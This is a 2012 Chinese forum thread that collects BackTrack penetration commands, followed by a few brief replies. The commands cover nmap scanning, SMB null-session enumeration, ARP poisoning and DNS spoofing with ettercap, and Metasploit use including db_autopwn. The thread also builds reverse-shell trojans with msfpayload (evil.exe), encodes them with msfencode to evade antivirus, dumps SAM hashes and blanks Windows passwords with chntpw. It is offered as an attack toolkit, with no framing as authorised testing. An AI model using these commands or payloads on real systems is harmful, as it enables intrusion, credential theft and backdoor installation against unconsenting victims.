破军刀吧 关注:78贴子:311
  • 14回复贴,共1

【技术】Backtrack 常用渗透命令集合

只看楼主收藏回复

nmap:
-sS 半开扫描TCP和SYN扫描。
-sT 完全TCP连接扫描。
-sU UDP扫描
-PS syn包探测(防火墙探测)
-PA ack包探测(防火墙探测)
-PN 不ping。
-n 不dns解析。
-A -O和-sV。
-O 操作系统识别。
-sV 服务版本信息(banner)
-p 端口扫描。
-T 设置时间级别(0-5)
-iL 导入扫描结果。
-oG 输出扫描结果。


1楼2012-02-04 14:19回复
    操作系统识别:
    p0f -i eth0 -U -p 开启混杂模式。
    xprobe2 ip|域名 检测os。
    banner获取:
    nc ip port 检测端口是否打开。
    telnet ip port 检测端口是否打开。
    wget ip 下载主页。
    cat index.html | more 显示主页代码。
    q 退出。


    2楼2012-02-04 14:19
    回复
      windows枚举
      nmap -sS -p 139,445 ip 扫描windows。
      cd /pentest/enumeration/smb-enum
      nbtscan -f targetIP 检测netbios。
      smbgetserverinfo -i targetIP 扫描name,os,组。
      smbdumpusers -i targetIP 列出用户。
      smbclient -L //targetIP 列出共享。
      使用windows:
      net use \\ip\ipc$ “” /u:”" 开启空会话。
      net view \\ip 显示共享信息。
      smbclient:
      smbclient -L hostName -I targetIP 枚举共享。
      smbclient -L hostName/share -U “” 用空用户连接。
      smbclient -L hostName -I targetIP -U admin普通用户连接。


      3楼2012-02-04 14:19
      回复
        rpcclient:
        rpcclient targetIP -U “”打开一个空会话。
        netshareenum 枚举共享。
        enumdomusers 枚举用户。
        lsaenumsid 枚举域SID。
        queryuser RID 查询用户信息。
        createdomuser 创建用户访问。


        4楼2012-02-04 14:19
        回复
          dns欺骗:
          nano /usr/local/share/ettercap/etter.dns编辑配置文件
          Plugins > Manage the plugins > dns_spoof 设置dns欺骗
          Mitm > Arp poisoning > Sniff remote connections > OK 设置ARP
          Start > Start sniffing 开始攻击
          Exploits漏洞利用:
          cd /pentest/exploits/exploit-db 进入目录
          cat sploitlist.txt | grep -i [exploit] 查询需要的漏洞
          cat exploit | grep “#include”检查运行环境
          cat sploitlist.txt | grep -i exploit | cut -d ” ” -f1 | xargs grep sys | cut -d “:” -f1 | sort -u只保留可以在linux下运行的代码


          6楼2012-02-04 14:20
          回复
            Metasploit:
            svn update 升级
            ./msfweb Web接口127.0.0.1:55555。.
            ./msfconsole 字符下的Console。
            help 帮助
            show <option> 显示选项
            search <name> 搜索名字
            use <exploit name> 使用漏洞
            show options 显示选项
            set <OPTION NAME> <option> 设置选项
            show payloads 显示装置
            set PAYLOAD <payload name> 设置装置
            show options 显示选项
            set <OPTION NAME> <option> 设置选项
            show targets 显示目标(os版本)
            set TARGET <target number> 设置目标版本
            exploit 开始漏洞攻击
            sessions -l 列出会话
            sessions -i <ID> 选择会话
            sessions -k <ID> 结束会话
            <ctrl> z 把会话放到后台
            <ctrl> c 结束会话
            jobs 列出漏洞运行工作
            jobs -K 结束一个漏洞运行工作
            show auxiliary 显示辅助模块
            use <auxiliary name> 使用辅助模块
            set <OPTION NAME> <option> 设置选项
            run 运行模块
            scanner/smb/version 扫描系统版本
            scanner/mssql/mssql_ping 测试mssql是否在线
            scanner/mssql/mssql_login 测试登录(暴力或字典)
            Attacker behind firewall: bind shell正向
            Target behind firewall: reverse shell反向
            Meterpreter衔接不懂dos的可以用这个:
            db_import_nessus_nbe 加载nessus的扫描结果
            db_import_nmap_xml 加载nmap的扫描结果


            7楼2012-02-04 14:20
            回复

              自动化攻击流程:
              cd /pentest/exploit/framework3
              ./msfconsole
              load db_sqlite3
              db_destroy pentest
              db_create pentest
              db_nmap targetIP
              db_hosts
              db_services
              db_autopwn -t -p -e
              字符接口攻击流程:
              ./msfcli | grep -i <name>
              ./msfcli <exploit or auxiliary> S
              ./msfcli <exploit name> <OPTION NAME>=<option> PAYLOAD=<payload name> E
              


              8楼2012-02-04 14:21
              回复
                做木马后门等:
                ./msfpayload <payload> <variable=value> <output type>
                S summary and options of payload
                C C language
                P Perl
                y Ruby
                R Raw, allows payload to be piped into msfencode and other tools
                J JavaScript
                X Windows executable
                ./msfpayload windows/shell/reverse_tcp LHOST=10.1.1.1 C
                ./msfpayload windows/meterpreter/reverse_tcp LHOST=10.1.1.1 LPORT=4444 X > evil.exe
                编码处理就是做免杀:
                ./msfencode <options> <variable=value>
                ./msfpayload linux_ia32_bind LPORT=4444 R | ./msfencode -b ‘\x00′ -l
                ./msfpayload linux_ia32_bind LPORT=4444 R | ./msfencode -b ‘\x00′ -e PexFnstenvMor -t c


                9楼2012-02-04 14:21
                回复
                  彩虹表:
                  rcrack *.rt -f hash.txt
                  本地修改密码:
                  mount
                  umount /mnt/hda1
                  modprobe fuse
                  ntfsmount /dev/hda1 /mnt/hda1
                  mount
                  ls -l /mnt/hda1 挂载c盘
                  bkhive /mnt/sda1/WINDOWS/system32/config/system system.txt
                  samdump2 /mnt/sda1/WINDOWS/system32/config/sam system.txt > hash.txt 备份sam文件
                  直接修改sam文件:
                  chntpw /mnt/sda1/WINDOWS/system32/config/SAM
                  Blank the password. *
                  Do you really wish to change it? y
                  Write hive files? y
                  unmount /mnt/sda1
                  reboot


                  12楼2012-02-04 14:22
                  回复


                    IP属地:江苏14楼2012-02-04 14:22
                    回复
                      好久没发帖了。发个帖子攒点经验、、、


                      15楼2012-02-04 14:25
                      回复

                        不错不错
                        顶上去
                        像这种帖子应该多来点
                        嘿嘿


                        16楼2012-02-08 00:18
                        回复



                          17楼2012-02-12 10:10
                          回复
                            天书哎


                            18楼2012-02-16 14:44
                            回复
                              额,真的不懂编程啊 我还是看看低级教程贴吧!等我看懂了再来完爆你!


                              19楼2012-04-24 07:45
                              回复